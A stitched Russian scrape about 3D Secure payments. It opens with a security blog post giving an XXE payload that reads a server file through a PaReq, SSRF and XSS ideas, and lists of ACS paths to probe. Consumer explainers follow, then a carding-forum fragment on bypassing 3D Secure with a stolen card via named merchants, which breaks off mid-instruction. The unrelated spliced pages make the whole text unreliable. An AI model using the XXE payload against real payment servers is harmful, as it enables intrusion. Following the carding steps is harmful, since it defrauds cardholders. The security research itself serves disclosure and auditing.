3D Secure, или что скрывают механизмы безопасности онлайн-платежей / Блог компании Digital Security / Хабр

Электронная коммерция — одна из самых больших и быстро растущих областей, в связи с чем она привлекает внимание как исследователей информационной безопасности, так и злоумышленников. Поэтому хотелось бы разобраться в некоторых аспектах механизмов безопасности, применяемых при проведении онлайн-платежей.

Один из протоколов, используемых для увеличения безопасности онлайн-платежей — 3D Secure. Это протокол, который был разработан на основе XML в качестве дополнительного уровня безопасности платежей, проводящихся без физического участия карты (card not present payment). VISA создала первую версию этого протокола, но вскоре его начали использовать и другие компании (Master Card, JCB International, AmEx, Мир), впоследствии объединившиеся с VISA в содружество EMV. EMV занимается поддержкой и развитием протокола 3DS.

Почему протокол 3D Secure называется именно так?

Полное название этого протокола — Three Domain Secure.

Первый домен — домен эмитента — это банк, выпустивший используемую карту.

Второй домен — домен эквайера — это банк и продавец, которому выплачиваются деньги.

Третий домен — домен совместимости (interoperability domain) — инфраструктура, используемая при оплате картой (кредитной, дебетовой, предоплаченной или другими типами платежных карт) для поддержки протокола 3D Secure. Он включает в себя Интернет, подключаемый модуль продавца (merchant plug-in), сервер контроля доступа (access control server) и других поставщиков программного обеспечения.

Зачем это нужно?

3D Secure обеспечивает новый уровень безопасности путем предоставления дополнительной информации.

Еще одним важным моментом является «перенос ответственности». Это означает, что в случае мошенничества вся ответственность ложится на банк-эмитент. Этот момент является очень важным для продавца (мерчанта), т.к. до появления 3D Secure урегулированием спорных вопросов приходилось заниматься мерчанту.

Также не стоит забывать о двух важных психологических аспектах: повышении доверия к онлайн-платежам и увеличении конверсии.

Конверсия может быть увеличена за счет обновлений протокола 3DS, направленных на сокращение взаимодействия с пользователем.

Версии протокола 3D Secure

v1.0 - 2001 г -…
v2.0 - 2014 г - Устарело
v2.1 - 2017 г
v2.2 - 2018 г

В настоящее время большинство платежных сервисов используют версию 1.0.2 при проведении онлайн CNP-платежей, запрашивающих OTP-код.

Версия 1.0.2 была создана в 2001 году и в ней есть некоторые проблемы.

На данный момент актуальной версией является v2.2, и EMV планирует, что к концу 2020-го года она будет использоваться везде.

Это основная схема, необходимая для понимания всего процесса платежа с использованием механизма 3DS.

На этом рисунке мы видим все три домена, используемые в протоколе, а также последовательность сообщений между всеми участниками платежной операции.

Как это работает?

Главное, что необходимо понять, — это то, что при использовании своей карты (виртуальной или реальной) для онлайн-оплаты, вы сталкиваетесь именно с протоколом 3DS. Поэтому сейчас мы проиллюстрируем все этапы совершения онлайн-платежа.

1 — Покупатель уже добавил все необходимые ему товары в корзину и нажал кнопку «Оплатить». В этот момент он попадает на страницу MPI-сервиса, где вводит данные своей карты.

После нажатия кнопки оплаты продавец (MPI) инициализирует старт платежного потока и, согласно протоколу, отправляет CRReq-запрос (Card Range Request). Данный запрос необходим, чтобы найти банк-эмитент вашей карты и получить CRR из домена взаимодействия. Этот запрос нас мало интересует.

После этого MPI отправляет VeReq (Verification Request). Этот запрос отправляется банку-эмитенту для проверки того, что 3DS для данной карты включен и карту можно использовать для оплаты.

VeRes (Verification Response) содержит дополнительную информацию для следующего этапа платежа.

Клиенты не могут видеть эти два типа сообщений.

2 — MPI создает PaReq (Payment Request) — запрос на оплату. Этот запрос отправляется через редирект в браузере клиента.

Итогом отправки PaReq становится отображение запроса на ввод OTP-кода.

3 — Клиент вводит OTP-код и возвращается на сайт продавца. Опять же в процессе этого через редирект от банка-эмитента к MPI передается PaRes (Payment Response), который содержит информацию о статусе проверки.

А поподробнее?

CRReq/CRRes для нас не очень важны. А вот VeReq/VeRes рассмотреть нужно.

<?xml version="1.0" encoding="UTF-8"?>
<ThreeDSecure>
  <Message>
    <VEReq>
      <version>1.0.2</version>
      <pan>4444333322221111</pan>
      <Merchant>
        <acqBIN>411111</acqBIN>
        <merID>99000001</merID>
        <password>99000001</password>
      </Merchant>
      <Browser>
        <deviceCategory>0</deviceCategory>
        <accept>*/*</accept>
        <userAgent>curl/7.27.0</userAgent>
      </Browser>
    </VEReq>
  </Message>
</ThreeDSecure>

В VeReq самым важным параметром является идентификатор сообщения, информация о продавце и PAN карты.

<?xml version="1.0" encoding="UTF-8"?>
<ThreeDSecure>
  <Message>
    <VERes>
      <version>1.0.2</version>
      <CH>
        <enrolled>Y</enrolled>
        <acctID>A0fTY+pKUTu/6hcZWZJiAA==</acctID>
      </CH>
      <url>https://dropit.3dsecure.net:9443/PIT/ACS</url>
      <protocol>ThreeDSecure</protocol>
    </VERes>
  </Message>
</ThreeDSecure>

VeRes возвращает message id, который необходим, чтобы сопоставить запрос с этим ответом. А status enrolled показывает, что карта поддерживается.

Однако наиболее важным параметром в данном сообщении является URL-адрес. Этот параметр указывает, где находится ACS сервер эквайера и куда нужно отправить PaReq.

Pareq

Браузер клиента, совершающего оплату, может произвести достаточно много редиректов по различным компонентам, участвующим в совершении платежа. Так, в России есть некоторое количество запросов, обрабатывающихся на стороне Национальной Системы Платежных Карт. Но сегодня нас интересует только традиционный этап, описанный в спецификации протокола. А именно этап передачи PaReq.

URL: https://site.ru/acs/pareq

MD=5ebde4d3-3796-7a4d-5ebd-e4d300003dd0&PaReq=eJxVUstywjAM%2FBUm98QPDDiMcIc2dMoh0AedKb2ljiDpNAFMUgJfXzuFPnzSrjQraWW4aoqPzieafb4pRx4LqNfBUm%2FSvFyPvOfFrS%2B9KwWLzCBGT6hrgwpi3O%2BTNXbydOS96VDocEX9FePaF1IIPwlF6qeoV7Inqeyh9hTcjx9xp%2BDcSNk%2BAQdygVbR6CwpKwWJ3l1PZ0rwQZ9SIGcIBZpppAaSuse7POwC%2BeagTApUy%2FEsmrwE8Xw2WQJpKdCbuqzMUfWFLb4AqM2HyqpqOyTkcDgExabEY3BMyhSbwNRAXB7I70D3tYv2Vq%2FJUzU7Teg8ejjE7xMWn9Z8Hk35fKEtNx4BcRWQJhUqTplklIoOC4c9NuwOgLQ8JIUbRDHK2vW%2BEWxdk%2FG%2F1F8KrO%2FGnuWyywUBNls7v62wZv7EQH5nvrlzlurKGsUGNOwy0ZfhXf5udlkmV7ey98rfmnjpjG6LnGJubeKUslbSASBOhpxvSM7nt9G%2Fb%2FEFnkK9RA%3D%3D&TermUrl=https%3A%2F%shop.ru%2Fgates%2F3ds

Платежный запрос, содержащий PaReq (метод POST), имеет три параметра:

1) MD — данные продавца. Он нужен MPI, чтобы сопоставить PaReq и PaRes одной транзакции;

2) PaReq — параметр этого платежного запроса. Он содержит всю важную информацию о платеже;

3) TermUrl — URL-адрес, на который клиент будет возвращен в конце процесса аутентификации 3D Secure.

Параметры TermURL и MD всегда отражаются в ответе на данный запрос. Поэтому могут встречаться имплементации ACS, уязвимые к атакам типа reflected XSS. В процессе аудита различных систем такие сервера были найдены.

Важный момент №1: ACS сервера обрабатывают все входящие PaReq!

Что входит в параметр PaReq?

Вы можете получить его значение, раскодировав PaReq. Это сделать достаточно легко, потому что PaReq — это Xml-> zlib-> base64-> urlencode. Для упрощения работы с этими запросами был написан плагин для burp.

Теперь мы видим, что из себя на самом деле представляет PaReq, а именно сообщение формата xml. Это сообщение содержит информацию о сумме платежа (purchAmount, amount и currency), некоторую информацию о продавце и MessageId (из VeReq).

При отправке правильно сформированного PaReq (в большинстве случаев вам не нужен полный набор запросов на оплату — требуется отправить лишь PaReq, содержащий параметры правильного типа и длины), мы получим PaRes — ответ на платеж, подобный следующему:

Первая мысль, которая может прийти в голову веб-исследователю, который видит XML-запрос — это попробовать выполнить XXE. И это правильный путь!

Но для начала посмотрим на то, что случится, если отправить некорректно сформированный PaReq. Мы получим ошибку! Вот несколько примеров таких ошибок:

<ThreeDSecure><Message><Error><version>1.0.2</version><errorCode>99</errorCode><errorMessage>Permanent system failure.</errorMessage><errorDetail>Failed to build error message.</errorDetail></Error></Message></ThreeDSecure>

<errorCode>5</errorCode><errorMessage>Format of one or more elements is invalid according to the specification.</errorMessage>

<errorCode>98</errorCode><errorMessage>Transient system failure</errorMessage>

<errorCode>4</errorCode><errorMessage>Critical element not recognized</errorMessage>

Ошибка может помочь получить дополнительную информацию о версии ACS. Некоторые из них могут также оказаться полезными для получения данных из XXE.

Раскрутим XXE

Рассмотрим следующий пример:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ThreeDSecure [<!ENTITY ac SYSTEM "file:///proc/sys/kernel/hostname">]><ThreeDSecure><Message id=“123-123-123-123-123-123"><PAReq><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>&ac;</merID><name>MerchantName</name><country>643</country><url>http://asdas.as</url></Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><amount>202000</amount><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent><desc>AcquirerName</desc></Purchase><CH><acctID>DYasdVQAOX6as3dfcxccwzPCR6Q74eS5</acctID><expiry>2209</expiry></CH></PAReq></Message></ThreeDSecure>

acqBIN, merID, xid, date, purchAmount и currency отражаются в PaRes. Однако во всех реализациях ACS, которые мы нашли, удалось использовать только merID. Остальные параметры проверяются на соответствие типам данных.

Еще один интересный параметр (и наиболее полезный для атаки) — это URL. Этот параметр не отражается, но и не проверяется. Поэтому его можно использовать для эксплуатации XXE.

Вернемся к нашему примеру. В одной из реализаций ACS мы обнаружили, что можем читать короткие файлы, а также получать ответ в PaRes error через параметр merID. Таким образом, используя PaReq из примера выше, мы получали следующий ответ:

<ThreeDSecure><Message><PARes><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN>
<merID>ACS server name</merID>
</Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent></Purchase><pan>000000000000000</pan><TX><time>20181004 21:34:21</time><status>U</status></TX><IReq><iReqCode>55</iReqCode><iReqDetail>PAReq.CH.acctID</iReqDetail></IReq></PARes></Message></ThreeDSecure>

Тем не менее в большинстве случаев оставалось только использовать параметр URL для получения DNS или HTTP-запроса к нашему сервису. Другой вектор — это выполнить DOS через XXE-атаку «billion laughs» (проверялось на тестовом сервере).

Где это можно найти?

В ходе нашего исследования мы обнаружили несколько распространенных URL-адресов:

/acs/pareq/___uid___
/acspage/cap?RID=14&VAA=B
/way4acs/pa?id=____id____
/PaReqVISA.jsp
/PaReqMC.jsp
/mdpayacs/pareq
/acs/auth/start.do

И распространенные имена поддоменов:

acs
3ds
3ds
secure
cap
payments
ecm
3dsauth
testacs
card

Впрочем, иногда вы можете найти и другие интересные пути.

Если вы хотите найти что-то новое, используйте proxy interceptor и записывайте процесс совершения платежей для интересующей вас платежной системы.

3D Secure v 2. *

Как мы писали ранее, в 3DS v1.0 есть некоторые проблемы.

Основная проблема в том, что покупатель может использовать множество разных типов устройств. Планшет, мобильный телефон, умные часы, умный чайник и т.д. Но сайт ACS не всегда разработан для взаимодействия со всеми типами устройств.

Для этого в 3DS 2.0 предусмотрели 3DS SDK.

Другая проблема состоит в том, что новый тип защиты требует дополнительного взаимодействия с клиентом. И этот момент влияет на конверсию. Решением проблемы конверсии стала возможность использования механизма управления рисками, который позволяет не заставлять пользователя вводить дополнительные секретные данные, если банк обладает достаточным количеством информации, подтверждающей личность клиента.

Следующий важный момент заключается в том, что технологии аутентификации развиваются. Соответственно, 3DS могла бы использовать не только OTP. Поэтому v2 задумывалась с возможностью расширения поддержки различных механизмов аутентификации.

Интересный факт про v1.0. Люди некоторых стран не доверяли этому протоколу, потому что видели редирект и думали, что это мошенничество!

Этот психологический момент послужил причиной изменения спецификации второй версии протокола для сокрытия момента перенаправления.

Как работает 3D Secure v2?

Начало потока платежей аналогично предыдущей версии. Клиент должен указать данные своей карты.

Первый и самый важный момент — это Risk Engine. В версии 1.0.2 клиенты всегда должны вводить второй фактор, например OTP. Однако в версии 2. * клиент может никогда не увидеть этот дополнительный защищенный запрос.

Особенности работы v2

Если вы посмотрите на схему потока платежей, вы увидите, что она похожа на предыдущую, но во 2-й версии больше этапов. Это происходит за счет добавления дополнительных аутентификационных запросов и механизма Risck Engine, который может совершать как один дополнительный запрос (при платеже через браузер), так и множество (используется 3DS SDK).

Условно, 2-ю версию можно разделить на два блока. Красный, где пользователь непосредственно влияет на передаваемую информацию, и желтый, где система сама собирает и передает информацию о пользователе.

А поподробнее?

AReq (base64url) расскажет все о вас и об устройстве, с которого совершена покупка.

Если вы задумаетесь о том, какой информацией о вас располагают рекламные агентства, то данные AReq вас не удивят. Но если вам кажется, что это плохо, рассмотрите следующий момент: банки знают все о ваших покупках и о вас. С этой точки зрения, некоторая дополнительная информация не так уж и плоха)

Это сообщение необходимо для работы системы управления рисками и упрощения покупок.

Если этой информации оказалось недостаточно, Risk Engine сперва попытается получить дополнительную информацию, и именно в этот момент клиент может получить OTP-запрос.

Что контролирует пользователь?

CReq (base64url json) — challenge request — сообщение, отправляемое браузером пользователя, в случае если ARes вернет сообщение о необходимости провести Challenge Flow.

{
"ThreeDSServerTransID": "8a880dc0-d2d2-4067-bcb1-b08d1690b26e",
"AcsTransID": "d7c1ee99-9478-44a6-b1f2-391e29c6b340",
"MessageType": "CReq",
"MessageVersion": "2.1.0",
"SdkTransID": "b2385523-a66c-4907-ac3c-91848e8c0067",
"SdkCounterStoA": "001"
}

Если платежный процесс использует 3D Secure SDK, это сообщение будет зашифровано (JWE).

В CReq вы можете увидеть следующие поля:

К сожалению, нам пока не удалось провести достаточно подробное исследование 2-й версии протокола 3DS, поэтому сложно сказать, какие уязвимости встречаются чаще. Вы можете стать первым, кто опубликует исследование на данную тему.

Проблемы (найденные и возможные)

На что смотреть в v1

• XXE в параметре Pareq:
  • DOS
  • чтение файла
  • ssrf

• XSS в параметрах TermUrl
• Blind XSS — все параметры и заголовки попадают в систему мониторинга
• Pareq не подписан, но в нем есть цена! Отсюда может последовать атака уже на магазин, т.к. если на стороне магазина не будет проверки суммы подтвержденной операции, то вы сможете совершить покупку вещи стоимостью в 100р за 1р.

На что смотреть в v2

• Blind XSS — все параметры и заголовки попадают в систему мониторинга
• Challenge flow, главное его поймать…

Тем, кто подумывает обратить свой взгляд на платежные системы, я бы посоветовал остановиться еще и на сервисах, предоставляющих 3DS как SaaS. Там может оказаться еще достаточно много вещей, которые помогут вам понять, как устроен мир онлайн-платежей.

https://github.com/w3c/webpayments/wiki
https://www.EMV.com/emv-technologies/3d-secure/
https://3dsserver.netcetera.com/3dsserver-saas/doc/current/schema/3ds-api.html
https://github.com/webr0ck/3D-Secure-audit-cheatsheet

P.S. Возможно, вам пришел в голову вопрос: «Я пользовался AliExpress, Amazon, другое, и мне не приходил OTP код. Здесь использовался 3DS?» Нет, не использовался. Это как раз примеры тех случаев, когда магазин берет на себя ответственность за мошеннические операции.

Что такое технология 3D-Secure на картах

Оплата картой через Интернет – это очень удобный инструмент, но до массового внедрения 3D-Secure он был очень опасным. Посудите сами, при оплате через Интернет никто не видит, кто сейчас вводит данные, а значит не может быть уверен, что картой пользуется ее владелец. Технология 3D-Secure – это лучший инструмент для защиты ваших денег на карте при оплате онлайн. Благодаря этой технологии банк удостоверяется, что платеж проводит владелец карты.

Что такое технология 3D-Secure

3D-Secure – это технология защиты онлайн платежей при помощи карты. Технологию разработала компания Visa, но чуть позже ее переняли все крупные игроки. Смысл технологий у каждой платежной системы единый, отличается лишь название и наравне с 3D-Secure употребляются следующие термины:

• Verified by Visa;
• MasterCard Secure Code;

Свое решение есть и у японской JCB International, они называют технологию –  J/Secure. В России распространены три платежные системы – Visa, MasterCard и российская система МИР. Отечественные карты также поддерживают технологию, ей дали название MirAccept. Но как бы ни называлась технология у каждой платежной системы, в России больше распространен термин 3D-Secure. И это справедливо, так как даже российская разработка – MirAccept, полностью построена на 3D-Secure.

Технология 3D-Secure является XML-протоколом и отвечает за безопасную оплату в сети Интернет. Для подтверждения личности клиенту на телефон приходит обычная SMS с проверочным кодом. Но это лишь верхушка айсберга. У платежных систем и банков существует не так много способов, как они могут проверить, кто пользуется картой для оплаты. Сам термин «3D-Secure» переводится как трех доменная защита, и не имеет ничего общего к трехмерному измерению. 3D = 3 Domains. В данном случае участвует 3 домена:

• Банк-эмитент;
• Банк-эквайер;
• Платежная система;

3D-Secure является гениальным решением, так как проверка позволяет одновременно оповестить владельца о готовящейся оплате и идентифицировать его. Этот процесс называется аутентификация. В результате платежная система проверяет, кто совершает оплату, тем самым повышается уровень безопасности платежных карт. При этом платеж может совершить и другой человек, но с явного ведома владельца карты.

Читайте также:  Школьная карта Ижкомбанка — как получить и использовать?

Как работает технология

Когда вы оплачиваете покупки в Интернете, то от вас запрашивают целый ряд данных вашей карты. Предполагается, что эти данные есть только у владельца карты, но их легко потерять, ведь все они написаны на самой карте. 3D-Secure добавляет еще одно действие в процесс оплаты, тем самым технология позволяет идентифицировать владельца.

Если технология 3D-Secure на карте включена, то между вводом данных карты и фактической оплатой появляется еще один шаг. Владельцу карты необходимо ввести секретный код. Этот код может быть, как постоянным, так и одноразовым. Постоянный код менее надежен, так как его также можно утратить, например, при оплате на компьютере, который заражен вирусом. В России больше распространены одноразовые коды, приходящие на телефон. В Европе и США доступен вариант с токенами – специальные устройства, генерирующие уникальный единственно верный ответ для любой транзакции.

Страница для ввода кода может быть различной — это зависит от вашего банка. Но вы должны помнить, даже если вы оплачивали через интерфейс стороннего сайта, например, на Ebay, Aliexpress или сайте РЖД, то для ввода проверочного кода вы будете перенаправлены на страницу вашего банка. Пример:

Для завершения оплаты вам необходимо ввести код. Если у вас 3D-Secure работает через SMS на телефон, то в течение нескольких минут вы получите проверочный код. Альфа-банк отправляет подобные коды:

Банк отправляет код только на тот телефон, который указан в договоре между владельцем карты и банком. Это позволяет идентифицировать, что платеж был инициирован владельцем. После ввода кода платеж обрабатывается и деньги списываются, если на карте имеется достаточная сумма.

На каких картах есть 3D-Secure

В России банки, как правило, подключают 3D-Secure автоматически ко всем картам, поддерживающим платежи в сети Интернет. Если ваша карта не позволяет оплатить покупку в сети и эта функция не может быть включена, то и технологии 3D-Secure у нее нет. Это объясняется просто, технология не имеет смысла для карт, где нет возможности совершить платеж в Интернете. Неполный список банков, поддерживающих 3D-Secure:

• Сбербанк;
• Альфа Банк;
• Тинькофф;
• Русский Стандарт;
• Почта банк;
• ВТБ;
• Бинбанк;
• Восточный;

Читайте также:  Банки партнеры Росбанка — cнятие наличных без комиссии

Международные правила платежных систем обязывают все банки предоставлять клиентам доступ к технологии 3D-Secure. Но вопрос – включена ли она у вас, это другой вопрос, нежели, есть ли эта технология в банке.

Если вы сомневаетесь, есть ли на вашей карте 3D-Secure, то развеять все сомнения можно двумя способами. Позвонить в банк или попробовать совершить оплату в Интернете. Первый способ надежней, так как некоторые банки, например, Альфа Банк, автоматически подключает 3D-Secure своим клиентам, но использует технологию не при всех онлайн платежах. Необходимо принудительно подключить 3D-Secure, если вы хотите полную защиту. В этом случае ни одна оплата через Интернет не пройдет, пока вы не введете секретный код.

Как подключить или отключить 3D-Secure

Подключение или отключение 3D-Secure доступно через банк, выпустивший карту. При подключении помните, что 3D-Secure – это бесплатная технология. Независимо от банка, Visa и MasterCard обязывают банки предоставлять технологию бесплатно. Платным может быть вариант лишь с покупкой специального устройства, генерирующего секретные коды – токена.

Для подключения 3D-Secure к своей карте вам придется оставить заявление. Если ваша карта поддерживает платежи в Интернете, то вам не могут отказать в подключении технологии. Отказ в подключении – это прямое нарушение правил платежных систем.

Технология автоматически подключается к большинству карт. Например, она есть на карте Tinkoff Black. Если вам по какой-либо причине нужно отключить 3D-Secure, то это возможно также через обращение в банк. Отключение требуется, например, если вы уезжаете за рубеж, где ваш номер точно не будет работать. Банк может отказать в отключении технологии.

Если вы переезжаете в другую страну, то вы можете не отключать технологию, а просто сменить номер. Некоторые российские банки, например, Альфа Банк, позволяет указать иностранный номер для получения секретных кодов.

Читайте также:  Дебетовая карта Ozon (Озон)

Безопасность

3D-Secure – это технология необходимая каждому, чья карта поддерживает оплату через сеть Интернет. Даже если вы сами далеки от совершения покупок онлайн, то и вам нужно подключить 3D-Secure к своей карте. Иначе вы рискуете стать жертвой кражи денег, ведь без 3D-Secure с вашей карты можно оплатить любую покупку в сети Интернет. А вы узнаете об этом лишь постфактум.

Ни одна технология не сможет гарантировать вам 100% безопасность. Но без 3D-Secure ваша карта и ваши деньги – это легкая добыча для мошенников. Если вы решите подключить 3D-Secure (или не отключать ее), то обязательно используйте одноразовые пароли.

Известны случаи мошенничества, когда злоумышленники совершали платеж украденной картой и звонили жертве, представляясь банковскими сотрудниками и просили сообщить код. Одновременно украсть данные карты и узнать телефон владельца – это сложное дело, но реально осуществимое. Будьте бдительны и запомните главное правило – никогда не сообщайте никому свой секретный код. Вы можете использовать код только сами и только на официальной странице подтверждения оплаты.

Технология уязвима и для компьютерных вирусов. Если ваша симка, куда приходят SMS с паролями от банка, работает в смартфоне на базе Android, то установите антивирус и на телефон. Существуют вирусы для телефона, когда жертва даже не замечает, что пришла нежданная СМС от банка. На самом деле, вирус сам инициировал оплату картой, получил сообщение с кодом, использовал код и удалил его с телефона.

Никогда не сохраняйте данные карты в браузере. Даже если технология 3D-Secure у вас включена, то возможно, что ваш банк использует ее не для всех транзакций. Такое бывает с карточками Visa в банке Тинькофф. В результате, мошенникам будет достаточно украсть ваши сохраненные данные, а код им даже не потребуется.

Обмануть систему можно, но обмануть вас еще проще. Поэтому оберегайте свои личные данные и помните, что 3D-Secure значительно увеличивает безопасность платежей в сети, но не гарантирует вам 100% сохранность.

Автор статьи, эксперт по финансам

Привет, я автор этой статьи. Имею высшее образование. Специалист по финансам и банкам. Более 3-х лет работал в коммерческих банках РФ. Пишу про финансы более 5 лет. Всегда в теме по лучшим вкладам и картам. Делаю выгодные вклады и получаю высокий кешбек по картам. Поставьте пожалуйста оценку моей статье, это поможет улучшить ее.

Материалы по теме

Что такое 3D-Secure на банковской карте. Технология 3D-Secure: безопасные онлайн-покупки :: SYL.ru

Мир медленно, но верно переходит от банкнот и монет к безналичным системам расчетов. Почти у каждого из нас есть пластиковая карта, с помощью которой можно расплатиться за покупки и предоставленные услуги, многие пользуются удобными мобильными приложениями от банков-эмитентов, а кто-то уже сделал своим электронным кошельком смартфон. Применяя удобные новшества, в первую очередь мы хотим, чтобы такого рода платежи были надежно защищены от мошенников и сбоев системы. Одним из надежных «охранников» электронных денежных переводов на сегодня считается технология 3D-Secure. О ней мы хотим вам рассказать в этом материале.

3D-Secure — что это?

Данная система — XML-протокол, который применяется в качестве дополнительной ступени безопасности для онлайн дебетовых и кредитных карт. Это двухфакторная идентификация держателя «пластика», не гарантирующая безопасности денежных ресурсов на счете.

На практике все выглядит довольно просто: при совершении покупки в интернете на ваш номер телефона, привязанный к банковской карте, приходит СМС-сообщение со специальным числовым кодом, который нужно ввести в окошечко формы оплаты для согласования платежа. Таким образом подтверждается, что операция совершается именно держателем «пластика». Безопасность считается неполной оттого, что, если грабитель украл и вашу банковскую карточку, и телефон, он без труда может потратить средства на необходимые ему покупки.

Почему именно 3D?

Название не имеет ничего общего с трехмерной реальностью. Что такое 3D-Secure? Это трехдоменная защита. 3D = 3 Domains. Доменами здесь выступают:

• Платежная система.
• Банк-эмитент.
• Банк-эквайер.

Протокол защиты 3D-Secure помогает как оповестить держателя карточки о моменте совершения платежа, так и идентифицировать его. Все вместе это зовется аутентификацией. Если не брать в расчет частные случаи, то таким образом можете совершить платеж только вы или третье лицо с вашего ведома.

Технология в платежных системах

Что такое 3D-Secure в нескольких словах? Если говорить просто, то данная технология — это защита расчетов, проводимых в интернете, с помощью вашей пластиковой карты. Ее разработчиком считается Visa, но позднее принцип данной системы защиты был перенят и другими крупными платежными системами. Отличия здесь только в названиях:

• «Виза»: Verified by Visa.
• JCB International: J/Secure.
• «Мастер Кард»: MasterCard Secure Code.
• «Мир»: MirAccept.

Так как все обозначенные системы защиты построены на принципе 3D-Secure, то их называют чаще всего именно так. Перейдем теперь к детальному разбору функционирования технологии на практике.

Как это работает?

Подробнее разобраться, что такое 3D-Secure, нам поможет представление алгоритма совершения обычного платежа с данной защитой:

1. Как только вы выберите оплату товара или услуг в интернете банковской картой, перед вами появится форма, в которую надо вписать данные: фамилию и имя держателя, номер «пластика», срок действия, защитный трехзначный код с оборота. Однако эту информацию легко может ввести и недобросовестное третье лицо.
2. Если карта без 3D-Secure, то вы не сможете совершить такую удаленную покупку, потому что почти все интернет-сервисы и магазины перешли на защиту платежей именно с помощью этой технологии. На втором этапе перед фактическим расчетом вам нужно будет ввести секретный код.
3. Шифр может быть как постоянным, так и одноразовым. В нашей стране более распространен последний вариант. Где-то в ходу постоянные коды, что менее надежно: последовательность символов можно забыть, потерять эту информацию. Больше шансов, что она станет доступна посторонним лицам. В США и Европе используются токены — устройства, генерирующие единственный правильный ответ для транзакции.
4. Обратите внимание, что, где бы вы ни совершали покупки онлайн, страница ввода кода будет одна и та же — характерная для банка-эмитента вашей карточки. На ней будет представлена информация о платеже, окошко для ввода секретного шифра и, собственно, кнопка «Отправить код».
5. Уже после того как вы отправили информацию из п. 1, на ваш мобильный номер, привязанный к «пластику», должен прийти необходимый для ввода шифр. Как предупреждает вас банк, его ни в коем случае нельзя показывать, сообщать третьим лицам! Только собственноручно ввести в окошко формы покупки онлайн.
6. Если код, пришедший на смартфон, совпадет с введенным вами, то система «даст добро» на обработку платежа и снятие с банковского счета указанной суммы.

На каких карточках есть 3D-Secure?

Как правило, все российские и зарубежные банки, сотрудничающие с «Визой», «Мастер Кард», «Миром», выпускают «пластик» с трехдоменной защитой. Исключением будут только карты, чья эмиссия случилась раньше ввода технологии в массовое обращение. Причиной того будет факт, что они не предназначены для совершения виртуальных покупок. Выход здесь один: заказать перевыпуск, чтобы иметь на руках современную карту.

Отечественные банки, чей «пластик» поддерживает технологию 3D-Secure:

• Сбербанк.
• ВТБ.
• «Бинбанк».
• «Тинькофф».
• «Альфа-банк».
• «Восточный».
• «Почта-банк».
• «Русский стандарт» и проч.

Как проверить наличие доступа к 3D-Secure?

Согласно международным предписаниям, все банки, выпускающие карты «Виза» и «Мастер Кард», обязаны предоставить своим клиентам доступ к трехдоменной системе защиты.

Проверить, защищена ли ваша карточка такой технологией, просто:

• Обратитесь в банк-эмитент и задайте все интересующие вас вопросы.
• Попробуйте совершить покупку в интернете. Если на номер телефона, который был привязан банковским работником к карте, не пришло сообщение с кодом, значит, 3D-Secure не активно. Однако такая проверка не совсем надежна: «Альфа-банк», например, автоматически подключает всем своим клиентам на «пластик» трехдоменную защиту, но она доступна только для определенных платежей. Чтобы активировать полную возможность использования, нужно нанести визит в банк.

Подключение и отключение 3D-Secure

Прежде всего помните, что активация и дезактивация данного протокола защиты абсолютно бесплатна для держателей карт, вне зависимости от банка-эмитента. Исключением будет только тот случай, когда вы решите приобрести токен, генерирующий проверочные коды.

Явившись в банк с паспортом, вам нужно написать заявление на подключение технологии 3D-Secure. Обычно же ее предлагают активировать сразу при получении вами «пластика». В том случае, если ваша карта поддерживает покупки через интернет, в подключении данной системы защиты отказать вам не могут.

Некоторым клиентам, например, в случае переезда за рубеж, требуется обратная операция — отключение трехдоменной защиты. Это возможно также единственным способом — при визите в банк с паспортом. Однако в этом случае кредитное учреждение правомочно и отказать вам. Остается один выход: отключить у сотового оператора мобильный номер, привязанный к карте. После того как он станет недоступным, технология в отношении вашей карты не сможет работать. В некоторых отечественных банках можно привязать к «пластику» и иностранный телефонный номер.

Несколько слов о безопасности

Что такое 3D-Secure? Технология призвана дополнительно защищать ваши накопления на банковской карте. Даже если вы не планируете в будущем совершать виртуальные покупки, все же стоит задуматься о ее подключении как создании еще одного барьера для мошенников. Советуем при активации данной технологии выбирать в качестве кодов подтверждения одноразовые пароли. Они становятся недействительными сразу после введения вами, отчего и более надежны, безопасны.

Еще один важный момент: никогда, никому и ни при каких обстоятельствах не сообщайте код подтверждения покупки, пришедший вам на телефон. Почти каждый месяц появляются новые мошеннические схемы выманивания такой информации. Напомним вам, что шифр вы вводите собственноручно в окошко формы подтверждения покупки.

Технология может быть уязвимой перед вредоносными программами, поражающими смартфон, которые могут производить без вашего ведома покупки, используя секретный код, приходящий в СМС. Поэтому защитите гаджет надежным антивирусом и не храните на нем фотографии вашего «пластика», данные, связанные с ним.

3D-Secure — дополнительная ступень защиты средств на банковской карте. Технология незаменима при совершении виртуальных покупок. Но надо помнить о том, что она не дает стопроцентной гарантии сохранности ваших средств на карте, отчего соответствующие личные данные всегда нужно держать в секрете от третьих лиц.

Обход 3d secure. (Инфа не достоверная).

Схема не моя
Здравствуйте.
Сегодня хотел бы затронуть на сегодняшний достаточно таки проблемную тему, а именно обход 3d secure.
Кто уже видел подобную статью сильно не кусайтесь.
p.s. все картинки будут в конце Итак, приступим.
Допустим у вас есть данные левой банковской карты, а именно
1) Номер карты
2) Срок
3) CVV
Естественно совершить операции по обналу/переводу не получится, т.к скорее всего подключен 3d secure, что же тогда делать? Где найти сервисы, которые сами дают возможность совершать транзакции без всяких смс и, 3d secure и т.д? Насколько мне известно есть один сервисок, работает ли он сейчас я хз, но раньше все было ок: L.L.Bean International
Так же никто не отменял хороший мерчант без использования 3d secure, но давайте-ка ближе к сути.​Все знают о Яндекс Директе? Это, типо, система контекстной рекламы. Вносишь бабки, размещаешь рекламу для каких-то целей и т.п. Так вот именно в этом яндекс директе и есть некая фича. Устанавливаем мобильное приложение, далее пополнить общий счет, вводим сумму и выбираем оплату по карте, вводим данные карты.

как подключить и что это

Покупки в интернет-магазинах и проведение различных онлайн-платежей без применения пластиков требует особого уровня безопасности. Технология 3D Secure Сбербанка была внедрена в целях борьбы с интернет-мошенниками, а также для предотвращения кражи платежных инструментов. Технология несколько усложняет использование карт для оплаты товаров или услуг через интернет, но сокращает вероятность потерять деньги по вине злоумышленников.

Сервис не является обязательным, но многие считают его просто необходимым для сохранности денег на картах

3D Secure Сбербанк
